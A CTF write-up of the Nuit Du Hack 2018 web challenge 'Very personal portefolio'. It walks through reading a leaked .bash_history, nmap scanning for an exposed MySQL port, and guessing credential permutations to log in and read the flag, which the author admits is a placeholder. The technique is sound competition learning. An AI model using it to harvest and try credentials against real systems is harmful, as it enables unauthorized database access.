Very personal portefolio Writeup (Nuit Du Hack 2018)

By SIben Wed 04 July 2018 in CTF Writeups,

"Very personal portefolio" (yup, portefolio was written like that) was a 100-point Web challenge at Nuit Du Hack 2018.

Challenge description

Because we can't access the platform anymore, this challenge shall remain without description for now.

Note: this writeup will most likely be updated with more details once the platform is online again.

We are provided with a url to a website. Since the platform has been taken down for now, this writeup will try to be as accurate as possible, but may lack some visual material.

Discovery

The page opens to a static HTML page using exactly this template I believe. When looking at the source, we can observe a commented line that contains the URL http://verypersonalportefolio.wargame.rocks/~francois/<somethingaboutimages>.

By searching for interesting files in the ~francois directory, we figure out that the folder is most likely a symlink to a home folder by stumbling upon a .bashrc file (with is very uninteresting) and a .bash_history file (which is very interesting).

Analyzing .bash_history

The file contains a lot of different commands, some of them creating or opening files, but most of them do not work. At the end of the file are some lines where it seems that François (the likely name of the user) is trying to connect to a MySQL database, that look like that:

mysql --user ierg457srg76fgyg --password francois verypersonalportefolio.wargame.rocks
mysql -user francois -password aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ verypersonalportefolio.wargame.rocks
mysql -user aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ -password francois verypersonalportefolio.wargame.rocks
...

So, it seems like François is not quite sure how to connect to his MySQL database. First things first, we run nmap on the target:

~$ nmap verypersonalportefolio.wargame.rocks
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-30 22:35 CEST
Nmap scan report for verypersonalportefolio.wargame.rocks (192.168.165.14)
Host is up (0.01s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 0.7 seconds

Bingpot! We can access MySQL from outside the server.

Connecting to the database

Now, all that's left is to figure out how to connect to the database (i.e. what are the right credentials?). We try all the possible permutations

ierg457srg76fgyg / francois
ierg457srg76fgyg / aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g
francois / ierg457srg76fgyg
francois / aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g / ierg457srg76fgyg
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g / francois

but nothing seems to work… until we figure out that François is so bad at typing commands, that he sometimes writes -password instead of --password, which is like passing the password assword to the command.

With this in mind, we try some more and figure out the correct credentials:

~$ mysql --user ierg457srg76fgyg -password -h verypersonalportefolio.wargame.rocks

Now that we're connected to the database, it's just a matter of retrieving the flag:

mysql> show databases;
+-----------
| Database |
+-----------
| NDH_2018 |
+----------+
1 row in set (0.00 sec)
mysql> use NDH_2018;
mysql> show tables;
+--------------------+
| Tables_in_NDH_2018 |
+--------------------+
| NDH                |
+--------------------+
1 row in set (0.00 sec)
> select * from NDH;
# And here we get some flag: ndh16_thisisarandomflagidonthavetherightone

And flagged!

Flag: ndh16_thisisarandomflagidonthavetherightone

Wrapping up

There was nothing too impressive about this challenge, but it reminds us that we have to be painfully detail-oriented when analyzing a luser's command history! Overall, it was a fun warm up!